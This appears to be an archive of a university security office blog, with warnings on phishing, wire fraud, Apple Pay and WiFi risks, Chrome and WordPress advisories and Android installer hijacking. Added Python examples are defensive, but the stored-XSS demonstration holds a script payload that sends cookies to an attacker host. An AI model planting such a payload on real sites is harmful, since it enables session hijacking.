The Return of the CISO Blog

Welcome (back) to the CISO blog, and thanks for visiting. This is the initial blog post of the second CISO to serve at Princeton.

My name is David Sherry, and I come to you after working most recently as the CISO at Brown University. I’m honored to become part of the Princeton community, and I look forward to working with all of you to make the university more secure.

My first few months will be spent learning the culture and the campus, and meeting as many people as I can. Forgive me if I don’t catch your name the first time, and trust me that I will work hard at that. During these initial months, I’ll be watching, observing, asking questions and listening. I’m already impressed with the experience and knowledge of those I’ve spoken with, and I’m thrilled to be part of such a passionate community.

After settling in, I’ll be working with the CIO to set a strategic vision and a corresponding plan for information security campus-wide. I am charged with leading the university’s efforts to increase security and reduce risk to information, and I’ll do this by providing broad and proactive security expertise, supporting a robust and secure network architecture, creating a culture of security through awareness, and supporting privacy and compliance efforts.

Of course, I can’t do this alone, and I consider every colleague to be part of the security “team”. So drop me a line, set up a time to chat over coffee, or invite me to join one of your staff meetings. We’re in this together!

Down the road, this blog will comment on newsworthy items on security and privacy, and share updates on the progress of the security mission. I’ll also be unveiling awareness efforts as they develop, and will be seeking feedback. Don’t be shy!

Until then, please introduce yourself. I’m on the second floor of 701 Carnegie. You can also follow me on Twitter @CISOatPrinceton.

Thanks for reading, and remember, Sec_rity is not complete without U!


Malware is Everywhere – Even on Apple Devices

In the ‘old’ days, circa 1999, Mac users claimed that they didn’t need to run anti-virus software because there were no viruses for Mac computers. At the time, that was close to the truth. But today no operating system, whether it’s on a laptop, desktop, tablet, or phone, is immune to viruses or malware. EVERY system is susceptible.

What can you do about it?

Well, if you’re running an operating system for which anti-virus and anti-malware tools have been developed (like Windows and Mac OS X), install and run those tools religiously. You’ll find that many vendors provide free versions of their corporate tools so that you can run them on your personal devices. In the office, use the tools provided by your SCADs, or download the tools that Princeton has made available to you. If you’re not sure where to find these tools, contact the Help Desk; they’ll gladly assist you.

Keep your operating system up to date with the latest security patches provided by the vendor. Subscribe to a mailing list that will notify you when new patches or updates are published.

Scan your device (laptop, workstation, tablet, or phone) for vulnerabilities, and for credit card numbers and other personal information that may be stored on it. Use the free tool available to you: http://www.princeton.edu/itsecurity/scanmydevice/. Limit what’s on your device, and you’ll limit your risk.

Be proactive about understanding what’s on your device and reducing your exposure to viruses and malware.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).


It’s Really OK to Ask

Have you ever received an email that didn’t look right?

Do you ever wonder if it’s safe to open an email attachment?

Have you ever received an email from an important executive in your organization asking you to do something out of the ordinary?

Eventually, we all receive emails that seem just a little off.  Socially, we’ve been raised to think that it’s not polite to question others when they ask something of you.  But in today’s world of electronic mail, how do you really know if someone legitimate actually sent you that email?  Sometimes you don’t!

So the next time you receive an email that seems just a little odd, whatever the reason, trust your judgement. Pick up the phone and ask the sender of the email (use a number you already have for them, not one given in the email; and remember that if you hit reply, your email will go back to whoever actually sent the message, who may not be legitimate). Did you send that email to me? Did you really want me to take an action at work that I usually wouldn’t? You may feel a little uncomfortable doing this the first or second time, but in the long run you would feel much worse if it turned out that the email wasn’t legitimate and you did the wrong thing. Sometimes these types of mistakes cost organizations millions of dollars.

There’s a scam going on right now, directed at financial departments within organizations. An executive (it’s not really the executive, but someone who has spoofed his/her email address) sends an email to someone in accounting asking them to wire a very large sum of money to a specified account. It’s not the usual account, but the individual in accounting is uncomfortable verifying the email with the executive. After all, s/he’s the big executive and the individual is just a worker in accounting… That’s exactly what the scammers are counting on: that a worker is uncomfortable questioning the request. It’s a different type of social engineering, but it still works.

So give yourself permission to ask.  Verify the email with the so-called sender.  Pick up the phone and talk, and don’t worry about feeling uncomfortable.  Do the right thing – trust but verify.  Check before doing something that doesn’t feel right.  You’ll feel much better in the long run.
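Some of this checking can be made mechanical before anyone reaches for the phone. The script below is an added example and not part of the original post: it parses a message’s headers and reports the three header-level signs of the wire-transfer scam described above, namely a display name that belongs to a known executive paired with an address that is not theirs, a Reply-To that points somewhere other than the From domain (which is why hitting Reply goes to the attacker), and a sender domain that merely resembles the organization’s. The organization domain, the executive directory and both sample messages are constructed for the example.

```python
import email
from difflib import SequenceMatcher
from email.utils import parseaddr

# Hypothetical organization domain and directory of executives' real addresses
# (constructed for this example; substitute your own directory in practice).
ORG_DOMAIN = "example.edu"
EXECUTIVE_DIRECTORY = {
    "jane doe": "jdoe@example.edu",   # e.g. the CFO
}


def _domain(address: str) -> str:
    """Lower-cased domain part of an address, or '' if it has no '@'."""
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def spoof_indicators(raw_message: str) -> list:
    """Return the reasons this message looks like an impersonation attempt.

    An empty list means no header check fired; it does NOT prove the message is
    genuine, which is why the post still says: pick up the phone.
    """
    msg = email.message_from_string(raw_message)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _reply_name, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_dom = _domain(from_addr)
    indicators = []

    # 1. Display name matches a known executive, but the address is not theirs.
    known = EXECUTIVE_DIRECTORY.get(from_name.strip().lower())
    if known and from_addr.lower() != known:
        indicators.append(
            f"display name '{from_name}' belongs to {known}, but address is {from_addr}")

    # 2. Reply-To points outside the From domain: a reply goes to the attacker,
    #    not to the person the message appears to come from.
    if reply_addr and _domain(reply_addr) != from_dom:
        indicators.append(f"Reply-To {reply_addr} does not match From domain {from_dom}")

    # 3. Look-alike domain: close to, but not equal to, the organization's domain.
    if from_dom and from_dom != ORG_DOMAIN:
        similarity = SequenceMatcher(None, from_dom, ORG_DOMAIN).ratio()
        if similarity >= 0.8:
            indicators.append(f"sender domain {from_dom} resembles {ORG_DOMAIN}")

    return indicators


# Constructed sample messages (not real mail).
SPOOFED_WIRE_REQUEST = """\
From: Jane Doe <jane.doe@examp1e.edu>
Reply-To: jane.doe@mail-example.net
To: accounts.payable@example.edu
Subject: Urgent wire transfer

Please wire $250,000 to the account below today. I'm in meetings, email only.
"""

GENUINE_MESSAGE = """\
From: Jane Doe <jdoe@example.edu>
To: accounts.payable@example.edu
Subject: Q3 budget

Attached is the Q3 budget for review.
"""

if __name__ == "__main__":
    for label, raw in [("spoofed", SPOOFED_WIRE_REQUEST), ("genuine", GENUINE_MESSAGE)]:
        print(label, spoof_indicators(raw) or "no header indicators")
```

None of these checks replaces the phone call: if the executive’s real mailbox has been compromised, every header is genuine and only out-of-band verification catches the request.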

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).


Apple Pay – Don’t Get Hoodwinked

A previous blog discusses why you shouldn’t keep your phone’s WiFi on all the time:  https://iso.princeton.edu/2015/04/23/why-you-should-keep-your-phones-wifi-off/

Leaving your phone’s WiFi on lets an attacker set up a hotspot that your phone will join on its own (for example, one that advertises the name of an open network your phone has used before). Once you’re on their network, they control what your phone receives and can surreptitiously push malicious content to it. But now it’s gotten worse: once the attacker has your phone on their network, they’re serving web pages that appear to come from Apple Pay and tell you to re-enter your credit card information.

Don’t be fooled! If a web page on your phone asks you to re-enter your credit card and other personal information for Apple Pay (you should be suspicious of any request like this), DON’T! If you think your Apple Pay information is incorrect or missing, disconnect from the WiFi network, use your phone’s cellular data connection (not a public WiFi connection), and check your cards in Apple Pay’s own settings on the phone. DO NOT RESPOND TO AN UNSOLICITED WEB PAGE REQUESTING YOUR PERSONAL INFORMATION.

So now there are two things you should remember:

1.  Keep your phone’s WiFi turned off, and only turn it on when absolutely necessary or when you’re connecting to a known (preferably private) wireless network

2.  Don’t enter credit card information if you receive an unexpected web page requesting that you re-enter credit card information

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).


Why You Should Keep Your Phone’s WiFi OFF

source:  http://freedomhacker.net/ios-8-security-flaw-hackers-crash-iphone-ipad-within-wifi-range-3992/

Security researchers unearthed a severe zero-day vulnerability in iOS 8 that could allow a remote attacker to repeatedly crash a user’s Apple iPhone, iPod or iPad just by having it connect to the attacker’s WiFi network, jamming the device into a never-ending boot loop (restart loop).

The attack is essentially a low-key Denial of Service (DoS) attack on iOS 8 devices by crashing individual apps and entire iPhones.

The new attack, dubbed No iOS Zone, was uncovered by security researchers Adi Sharabani and Yair Amit, of the mobile device security firm, Skycure. The duo disclosed their latest research at the RSA security conference on Tuesday.

It was shown during a live presentation that it is possible for an attacker to create a malicious WiFi hotspot disguised as an open network, get mobile devices to connect, and then begin crashing them.

Researchers even demonstrated that the No iOS Zone attack can make iOS functions freeze, leaving the phone even less usable. This is caused by triggering a large volume of reboot requests at one time.

The No iOS Zone attack is nothing more than a Denial-of-Service attack: it causes the phone to crash and become unusable, just as a DoS attack against a website overloads the server and takes the website offline, leaving both the device and the server unreachable.

“Anyone can take any router and create a Wi-Fi hotspot that forces [nearby users] to connect to [the attacker’s] network,” Sharabani said during his No iOS Zone presentation at RSA, “and then manipulate the traffic to cause [their mobile] apps and the operating system to crash.”

So is there any way to keep your iPhone from being plagued by the attacker’s malicious hotspot? No. In short, there is no way to get rid of the No iOS Zone attack once it has started, because your phone is left in an unreachable state.

The only way to avoid the attack is to leave, or run away from, the malicious WiFi and connect somewhere safer. Or disable your WiFi.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).


Vulnerabilities in Google Chrome Identified

The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) @ the Regional Operations Intelligence Center (ROIC) provides the following advisory for your situational awareness.

OVERVIEW:
Multiple vulnerabilities have been discovered in Google Chrome, which could result in remote code execution. Google Chrome is a web browser used to access the Internet. These vulnerabilities can be exploited if a user visits, or is redirected to, a specially crafted web page. Attackers can exploit these issues to execute arbitrary code in the context of the browser.

Depending on the privileges afforded to the browser an attacker can bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.

THREAT INTELLIGENCE:
There are currently no reports of these vulnerabilities being exploited in the wild.

SYSTEM AFFECTED:
* Google Chrome Prior to version 42.0.2311.90

RISK:
Government:
* Large and medium government entities: High
* Small government entities: High
Businesses:
* Large and medium business entities: High
* Small business entities: High
Home users: High

TECHNICAL SUMMARY:
Thirteen vulnerabilities have been discovered in Google Chrome. These vulnerabilities can be triggered by a user visiting a specially crafted web page. Details of these vulnerabilities are as follows:
* Cross-origin bypass in the HTML parser (CVE-2015-1235)
* Cross-origin bypass in Blink (CVE-2015-1236)
* Use-after-free in IPC (CVE-2015-1237)
* Out-of-bounds write error in Skia (CVE-2015-1238)
* Out-of-bounds read error in WebGL (CVE-2015-1240)
* Tap-Jacking attack (CVE-2015-1241)
* Type Confusion attack in V8 (CVE-2015-1242)
* HSTS bypass attack in WebSockets (CVE-2015-1244)
* Use-after free in PDFium (CVE-2015-1245)
* Out-of-bounds read error in Blink (CVE-2015-1246)
* Scheme issues flaw in OpenSearch (CVE-2015-1247)
* SafeBrowsing bypass attack (CVE-2015-1248)
* Multiple vulnerabilities were fixed in V8, the JavaScript engine in use by Google Chrome (CVE-2015-1249)

Successful exploitation could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges afforded to the browser an attacker can bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.

RECOMMENDATIONS:
We recommend the following actions be taken:
* Apply appropriate patches provided by Google to vulnerable systems immediately after appropriate testing.
* Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
* Remind users not to visit untrusted websites or follow links provided by unknown or untrusted sources.
* Inform and educate users regarding the threats posed by hypertext links contained in emails or attachments, especially from untrusted sources.

REFERENCES:

Google Chrome:
http://googlechromereleases.blogspot.ie/2015/04/stable-channel-update_14.html

Security Focus:
http://www.securityfocus.com/bid/74165
http://www.securityfocus.com/bid/74167

CVE:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1235
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1236
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1237
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1238
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1240
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1242
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1244
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1245
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1246
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1247
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1248
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1249
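The useful follow-up to an advisory like this one is checking an inventory against the version floor it gives (“prior to 42.0.2311.90” here, and “prior to 1.4.4” for WP Super Cache further down this page). The snippet below is an added example, not from NJCCIC or Google: it compares dotted version strings component by component, which matters because plain string comparison sorts 42.0.2311.135 before 42.0.2311.90 and would report a patched browser as vulnerable. The inventory data is constructed.

```python
import re


def parse_version(text: str) -> tuple:
    """Turn a dotted version string into a tuple of ints so that comparison is
    numeric per component. Lexicographic string comparison gets this wrong:
    '42.0.2311.135' < '42.0.2311.90' as strings, because '1' < '9'."""
    m = re.fullmatch(r"\d+(?:\.\d+)*", text.strip())
    if not m:
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(part) for part in m.group(0).split("."))


def is_vulnerable(installed: str, fixed: str) -> bool:
    """True when `installed` is older than the first fixed release `fixed`.
    Shorter tuples are zero-padded so that '1.4' compares equal to '1.4.0'."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


# First fixed versions, taken from the two advisories on this page.
FIXED_VERSIONS = {
    "chrome": "42.0.2311.90",
    "wp-super-cache": "1.4.4",
}

# Constructed inventory, as a fleet scan might report it.
INVENTORY = [
    ("chrome", "41.0.2272.118"),
    ("chrome", "42.0.2311.90"),
    ("chrome", "42.0.2311.135"),
    ("wp-super-cache", "1.4.3"),
    ("wp-super-cache", "1.4.4"),
]


def flag_inventory(inventory=INVENTORY) -> list:
    """Return the (product, version) pairs that are below their fixed version."""
    return [(name, ver) for name, ver in inventory
            if is_vulnerable(ver, FIXED_VERSIONS[name])]


if __name__ == "__main__":
    for name, ver in flag_inventory():
        print(f"{name} {ver} needs updating")
```

Vendor version schemes with letters or pre-release tags (“1.4.4-beta”) need a richer parser; this one deliberately rejects them rather than silently mis-comparing.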


Here Comes Another WordPress Vulnerability

It’s no longer a surprise that there’s another WordPress vulnerability.

WP Super Cache, a WordPress plugin, contains a persistent XSS vulnerability in versions prior to 1.4.4. Exploitation of this vulnerability could allow a remote attacker to take control of the affected system.
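This page does not say where in WP Super Cache the flaw sat, and the example below does not try to. It is an added illustration of the general persistent (stored) XSS pattern in a caching plugin, written in Python rather than PHP so it runs stand-alone, and it is not the plugin’s code. A value an attacker controls (here a cached request URL; the data is constructed) is stored and later rendered into an administrator’s page. The vulnerable renderer emits it verbatim; the hardened one HTML-encodes it for the context it lands in. Because the listing is viewed with an administrator’s session, script that runs there acts as the administrator, which is what “take control of the affected system” means in practice.

```python
from html import escape

# Constructed cache index: URLs a caching plugin has seen. The last one carries
# an attacker-supplied query string. The cache stores it as-is, so the payload
# persists and is replayed to every administrator who opens the listing page.
CACHED_URLS = [
    "/",
    "/about/",
    '/?s="><script>document.location="https://attacker.example/?c="+document.cookie</script>',
]


def render_cache_list_vulnerable(urls) -> str:
    """Admin listing built by string concatenation: whatever was stored is
    emitted verbatim into both an attribute value and an element body."""
    rows = "".join(f'<li><a href="{u}">{u}</a></li>' for u in urls)
    return f"<ul>{rows}</ul>"


def render_cache_list_hardened(urls) -> str:
    """Same listing with output encoding. html.escape() encodes <, >, & and,
    by default, both quote characters, so a value can neither inject a tag in
    the element body nor break out of the quoted href attribute."""
    rows = "".join(
        f'<li><a href="{escape(u)}">{escape(u)}</a></li>' for u in urls)
    return f"<ul>{rows}</ul>"


def contains_live_script(html_fragment: str) -> bool:
    """Crude check for the demonstration: did a raw <script> tag survive?"""
    return "<script>" in html_fragment


if __name__ == "__main__":
    print("vulnerable:", contains_live_script(render_cache_list_vulnerable(CACHED_URLS)))
    print("hardened:  ", contains_live_script(render_cache_list_hardened(CACHED_URLS)))
```

Encoding at output time is the fix; filtering at storage time is not, because the same stored string may later be rendered into HTML, into an attribute, into JavaScript, or into a log viewer, and each context needs its own encoding.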

Users and administrators are encouraged to review the WP Super Cache Changelog for more information and update to version 1.4.4 if affected.

If you’re running WordPress on cPanel, consider using the Enterprise version offered at Princeton, where all the patching is done for you and you don’t need to worry about each announced vulnerability and patch. Contact the Support and Operations Center (helpdesk@princeton.edu) for more information.

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Support and Operations Center (helpdesk@princeton.edu).


Android Malware – Update to Protect Yourself

There is a widespread vulnerability in Google’s Android OS estimated to affect 49.5 percent of all current Android users. An attacker exploiting it:

– can modify or replace a seemingly benign Android app with malware, without the user’s knowledge. This only affects applications downloaded from third-party app stores.

– can gain full access to a compromised device, including usernames, passwords, and sensitive data.

Palo Alto Networks worked with Google and major manufacturers such as Samsung and Amazon to inform them of the vulnerability and issue patches for their devices.

The vulnerability in the Android OS permits an attacker to hijack the ordinary Android installation process. This hijacking technique can be used to bypass the permissions view shown to the user and install malware with arbitrary permissions. It can substitute one application for another: for instance, a user tries to install a legitimate copy of “Angry Birds” and ends up with a flashlight app that’s running malware.

For detailed information on the vulnerability and mitigation strategies:  http://researchcenter.paloaltonetworks.com/2015/03/android-installer-hijacking-vulnerability-could-expose-android-users-to-malware/
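The write-up linked above gives the details; in short, the installer showed the user the permissions of the APK it had just read from shared storage, then installed whatever file sat at that path a moment later, and a malicious app already on the device could replace the file in between. That is a time-of-check/time-of-use race, and it is why only installs from third-party app stores were affected. The Python below is an added, simplified model of that race and not Android code: a made-up package format, a temporary directory standing in for external storage, and an attacker callback that swaps the file between check and use. The hardened installer reads the package once and installs the same bytes it verified; copying the package into a location other apps cannot write before verifying it achieves the same thing.

```python
import os
import tempfile
from typing import Callable

# Constructed stand-in for an APK: a one-line manifest, then the payload.
BENIGN_APP = b"name=angry-birds;perms=INTERNET\n<benign code>"
MALICIOUS_APP = b"name=flashlight;perms=INTERNET,READ_SMS,READ_CONTACTS\n<malware>"


def parse_manifest(package: bytes) -> dict:
    """Read the app name and permission list from the package header line."""
    header = package.split(b"\n", 1)[0].decode()
    fields = dict(kv.split("=", 1) for kv in header.split(";"))
    return {"name": fields["name"], "perms": fields["perms"].split(",")}


def install_vulnerable(path: str, user_consents: Callable[[dict], bool],
                       race: Callable[[], None]) -> dict:
    """Time-of-check/time-of-use bug: the permissions shown to the user come
    from one read of the shared file, but the bytes installed come from a
    second read of the same path. `race` models another app running between
    the two reads."""
    with open(path, "rb") as f:
        shown = parse_manifest(f.read())          # time of check
    if not user_consents(shown):
        raise PermissionError("user declined")
    race()                                         # attacker swaps the file here
    with open(path, "rb") as f:
        return parse_manifest(f.read())            # time of use: whatever is there now


def install_hardened(path: str, user_consents: Callable[[dict], bool],
                     race: Callable[[], None]) -> dict:
    """Read the package once into memory only the installer controls, show the
    user the permissions of *those* bytes, and install the same bytes. A later
    change to the shared file cannot affect what is installed."""
    with open(path, "rb") as f:
        package = f.read()
    shown = parse_manifest(package)
    if not user_consents(shown):
        raise PermissionError("user declined")
    race()                                         # the swap happens, but too late
    return parse_manifest(package)


def demo(installer) -> dict:
    """Stage the benign app in a shared directory, let the attacker replace it
    between check and use, and return what actually got installed."""
    with tempfile.TemporaryDirectory() as shared_dir:   # stands in for external storage
        apk_path = os.path.join(shared_dir, "download.apk")
        with open(apk_path, "wb") as f:
            f.write(BENIGN_APP)

        def attacker_swaps_file():
            with open(apk_path, "wb") as f:
                f.write(MALICIOUS_APP)

        def user_consents(manifest):
            # The user approves only what they were shown: the INTERNET permission.
            return manifest["perms"] == ["INTERNET"]

        return installer(apk_path, user_consents, attacker_swaps_file)


if __name__ == "__main__":
    print("vulnerable installer installed:", demo(install_vulnerable)["name"])
    print("hardened installer installed:  ", demo(install_hardened)["name"])
```

The general rule the example illustrates: never verify a file by path and then use it by path when another principal can write to that path; verify and use the same bytes, or the same open file descriptor, or a private copy.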

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Help Desk (helpdesk@princeton.edu).


Let’s Keep Our Passwords Private

Your password is a private piece of information that you should never give out freely.  Remember, it’s what protects your accounts from being accessed by strangers.  NEVER GIVE OUT YOUR PASSWORD, especially if someone asks you for it.

Recently, as part of the Jimmy Kimmel Show, an interviewer went out onto Hollywood Blvd in Los Angeles and asked random people, “What’s your password?”

Sadly, and although it’s quite entertaining, people willingly told the interviewer their passwords. Here’s the video on YouTube: https://www.youtube.com/watch?v=opRMrEfAIiI .

If you have any questions about this post, or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Help Desk (helpdesk@princeton.edu).


It’s Tax Season And The Fraudsters Are At It Again!

The following information is brought to you by REN-ISAC (the Research and Education Networking Information Sharing and Analysis Center, http://www.ren-isac.net/):

Phishing: Scam artists pose as legitimate entities—such as the Internal Revenue Service (IRS), other government agencies, and financial institutions—in an attempt to defraud taxpayers. They use phishing emails to lure users to open malicious email attachments or visit malicious sites to gain access to passwords and sensitive information.

Phone Fraud: The Treasury Inspector General for Tax Administration has received reports of roughly 290,000 contacts and has become aware of nearly 3,000 victims who have collectively paid over $14 million as a result of a phone scam, in which scammers make unsolicited calls to taxpayers fraudulently claiming to be IRS officials and demanding that they send them cash via prepaid debit cards.

Fraudulent filings: There is a reported increase in attempts by scammers who attempt to use victims’ personal information to file fraudulent tax returns, then claim resulting refunds. Taxpayer victims generally have no idea that anything is wrong until they attempt to submit their own returns. In many cases, it is extremely difficult to determine how the perpetrators were able to get the victims’ filing information.

WHAT YOU CAN DO:

  • Beware of contact purportedly from the IRS by phone, email, text, or social media:
    • The IRS will never contact taxpayers by email to request personal or financial information or demand immediate payment via phone.
    • Call the IRS directly at 800-829-1040 (and your state tax agency at its published number) to confirm that a communication is legitimate.
    • Report suspicious activity to phishing@irs.gov or file a report with the Treasury Inspector General for Tax Administration (TIGTA), the Federal Trade Commission, and the police.
  • Remember to protect your personally identifiable information
    • File tax returns early to thwart identity thieves.
    • Do not open email attachments or click on links from unknown or questionable sources.
    • Do not provide social security numbers and financial account information to anyone unless required.
    • If you think you are a victim of identity fraud, contact the IRS Identity Protection Specialized Unit, 1-800-908-4490, and the states where you file taxes to ensure steps are taken to secure your information.

And, as always, if you have any questions about this post or any information security issue, contact the Chief Information Security Officer, Ellen Amsel (eamsel@princeton.edu) or the Help Desk (helpdesk@princeton.edu).
